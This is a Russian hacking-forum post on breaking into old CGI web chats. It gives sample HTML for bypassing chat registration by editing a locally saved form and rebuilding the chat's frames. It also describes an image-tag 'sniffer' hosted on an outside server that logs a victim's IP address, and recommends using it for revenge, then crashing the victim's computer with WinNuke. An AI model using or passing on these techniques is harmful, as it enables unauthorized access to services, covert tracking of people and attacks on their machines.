Форум АНТИЧАТ - Взлом html чата

Можно взломать HTML чаты типа того:

Где вместо стандартной строки ввода используется
Где настройки пользователя (цвет сообщений, цвет имени, телефон бабушки и прочий маразм админов) находятся в отдельном фрейме. К примеру таким чатом является www.chat.orc.ru
Где есть такая строчка . Здесь все зависит от версии чата. Откройте форму отправки сообщений в HTML. Если там есть такая строка <input type="hidden" name="color" value="standart">, то такой чат взлому неподдается. Если же value=black, к примеру, то взлом осуществим.
Чаты поддающиеся взлому: Это CGI-чаты. Из за общедоступности взлома чаты превращаются в большую помойку из порнушных изображений и бегающих строк. Многим это надоедает и они уходят оттуда. Но не стоит отчаиватся обычно 2-3 человека там сидят... Общий принцип взлома чата одинаков. Сначала вам нужно добится того, чтобы вы могли со своей формы, сохраненной на диске, писать в чат. Последующий взлом зависит от типа этого чата.

В любом чате фрейм, в котором пишутся сообщения, генерится динамически (для каждого входящего) и, возможно, содержит скрытые поля, типа

<input type=hidden name=cookie value=SP210125>

Сохраняем содержимое этого фрейма на диске, дальше правим его так, чтобы можно было с ним работать со своего винта. Заменяем ссылки типа /cgi-bin/refresh.pl на полный путь www.chat.nsm.ru/cgi-bin/refresh.pl и вместо скрытых полей пишим ну что-то, типа

<input type=text name=cookie value=SP210125 >

Следующий этап, создаем html документ чтобы собрать чат из кусков.

"Enter.htm"

<html>

<frameset rows="80%,20%">

<frameset cols=70%,30%">

<frame name="razg" src="http://www.chat.msm.ru/cgi-bin/refresh.cgi?win+razgovor+nocooki#end">

<frme name="rigt" src="http://www.chat.msm.ru/right.html">

</frameset>

<frame name="bot" src="start.htm">

</frameset>

<html>

Ну вот, выглядит это примерно так. Start.htm-это тот фрейм который мы сохранили и изменили. Далее открываем обозревателем start.htm и попадаем в чат минуя стандартную процедуру регистрации.

Как использовать Sniffer

Для тех, кто не знает... Sniffer(нюхач) - программа, которая служит для добывания "секретной" информации, данный "програмный продукт" написаный в виде CGI скрипта на языке Perl служит для добывания IP адресов в недрах сети Internet (Intranet). Прнцип работы: вы размещаете данный снифер в виде картинки, после чего, в логах на сервере делаются записи (в зависимости от посещения этой страницы), где первая запись - Дата , Вторая - (Уникальный с целью наименьшей путаницы) и Третья собственно сам IP адрес. Рекомендации по использованию: 1)(WEB) Chat's. 2) Неординарные ситуации, как то: Вы (заранее) размещаете на "левой" странице e.g. http://www.host.ext/~yourname/page.htm ссылку на картинку , которая выглядит примерно так:

<html>

<body>

...

<img src="http://www.soul.rinet.ru/cgi-bin/sniffer.pl?id">

...

</body>

</html>

где ID - ваш уникальный идентификатор например затем, вас неожиданно обидели, естественно вы хотите отомстить обидчику и в свою очередь просите его зайти на страницу... ничего неподозревающий человек заходит на вашу страницу, его Браузер считывает картинку, и вы можете приспокойно смотреть лог , где запись [...] (vasya) 127.0.0.1 - это собственно и есть IP адрес обидчика, после данной операции вы можете спокойно положить его, ну к примеру Winnuk'ом.ВНИМАНИЕ: В целях снижения загруженности сервера доступно только последних 500 адресов. Disclaimer (отмазка).